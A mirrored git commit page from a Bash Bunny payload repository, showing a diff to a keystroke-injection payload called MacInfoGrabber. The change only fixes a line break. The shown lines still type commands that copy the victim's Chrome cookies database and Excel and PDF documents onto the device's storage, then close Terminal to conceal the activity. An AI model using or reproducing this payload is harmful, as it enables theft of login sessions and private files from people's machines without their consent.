mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Updated MacInfoGrabber payload to remove superfluous newline (#74)
There was a line break on line 30 where in reads Chrome cookies and moves to BashBunny mass storage. Removed line break.
This commit is contained in:
@@ -27,8 +27,7 @@ QUACK DELAY 5000
|
|||||||
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx
|
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
QUACK DELAY 500
|
QUACK DELAY 500
|
||||||
QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \>
|
QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/$lootdir/chromecookies.db
|
||||||
/Volumes/BashBunny/$lootdir/chromecookies.db
|
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
QUACK DELAY 1000
|
QUACK DELAY 1000
|
||||||
QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal
|
QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal
|
||||||
|
|||||||
Reference in New Issue
Block a user